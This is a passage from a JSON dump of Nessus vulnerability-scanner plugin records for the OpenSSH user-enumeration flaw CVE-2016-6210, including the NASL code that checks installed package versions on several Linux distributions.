cpu:\"s390x\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openssh-debuginfo-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"pam_ssh_agent_auth-0.9.3-123.el6_9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc\");\n }\n}\n", 
"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:31:37", "description": "An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)", "edition": 28, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "CentOS 6 : openssh (CESA-2017:2563)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-01T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssh-ldap", "p-cpe:/a:centos:centos:openssh", "p-cpe:/a:centos:centos:openssh-server", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:openssh-clients", "p-cpe:/a:centos:centos:openssh-askpass", "p-cpe:/a:centos:centos:pam_ssh_agent_auth"], "id": "CENTOS_RHSA-2017-2563.NASL", "href": "https://www.tenable.com/plugins/nessus/102885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2563 and \n# CentOS Errata and Security Advisory 2017:2563 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102885);\n 
script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"RHSA\", value:\"2017:2563\");\n\n script_name(english:\"CentOS 6 : openssh (CESA-2017:2563)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. 
(CVE-2016-6210)\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-August/022529.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1cc50be7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6210\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"pam_ssh_agent_auth-0.9.3-123.el6_9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / 
openssh-askpass / openssh-clients / openssh-ldap / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:51:45", "description": "From Red Hat Security Advisory 2017:2563 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. 
(CVE-2016-6210)", "edition": 25, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "Oracle Linux 6 : openssh (ELSA-2017-2563)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-01T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:openssh", "p-cpe:/a:oracle:linux:openssh-server", "p-cpe:/a:oracle:linux:openssh-askpass", "p-cpe:/a:oracle:linux:openssh-ldap", "p-cpe:/a:oracle:linux:openssh-clients", "p-cpe:/a:oracle:linux:pam_ssh_agent_auth"], "id": "ORACLELINUX_ELSA-2017-2563.NASL", "href": "https://www.tenable.com/plugins/nessus/102904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2563 and \n# Oracle Linux Security Advisory ELSA-2017-2563 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102904);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"RHSA\", value:\"2017:2563\");\n\n script_name(english:\"Oracle Linux 6 : openssh (ELSA-2017-2563)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2563 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007169.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pam_ssh_agent_auth\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"pam_ssh_agent_auth-0.9.3-123.el6_9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-clients / openssh-ldap / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:43:56", "description": "OpenSSH secure shell client and server had a user enumeration problem\nreported.\n\nCVE-2016-6210\n\nUser enumeration via covert timing channel\n\nFor Debian 7 'Wheezy', this problem has been fixed in version\n6.0p1-4+deb7u5.\n\nWe recommend that you upgrade your openssh packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 19, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-08-01T00:00:00", "title": "Debian DLA-578-1 : openssh security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2016-08-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssh-client", "p-cpe:/a:debian:debian_linux:ssh-krb5", "p-cpe:/a:debian:debian_linux:ssh", "p-cpe:/a:debian:debian_linux:openssh-client-udeb", "p-cpe:/a:debian:debian_linux:openssh-server-udeb", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:openssh-server", "p-cpe:/a:debian:debian_linux:ssh-askpass-gnome"], "id": "DEBIAN_DLA-578.NASL", "href": "https://www.tenable.com/plugins/nessus/92641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-578-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92641);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6210\");\n\n script_name(english:\"Debian DLA-578-1 : openssh security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"OpenSSH secure shell client and server had a user enumeration problem\nreported.\n\nCVE-2016-6210\n\nUser enumeration via covert timing channel\n\nFor Debian 7 'Wheezy', this problem has been fixed in version\n6.0p1-4+deb7u5.\n\nWe recommend that you upgrade your openssh packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/07/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/openssh\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-client-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-server-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ssh-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"openssh-client\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssh-client-udeb\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssh-server\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssh-server-udeb\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ssh\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ssh-askpass-gnome\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ssh-krb5\", reference:\"6.0p1-4+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:14:23", "description": "Security fix for CVE-2016-6210\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 5.9, "vector": 
"AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-07-21T00:00:00", "title": "Fedora 24 : openssh (2016-7440fa5ce2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssh", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-7440FA5CE2.NASL", "href": "https://www.tenable.com/plugins/nessus/92476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-7440fa5ce2.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92476);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"FEDORA\", value:\"2016-7440fa5ce2\");\n\n script_name(english:\"Fedora 24 : openssh (2016-7440fa5ce2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-6210\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-7440fa5ce2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"openssh-7.2p2-10.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T08:52:27", "description": "According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
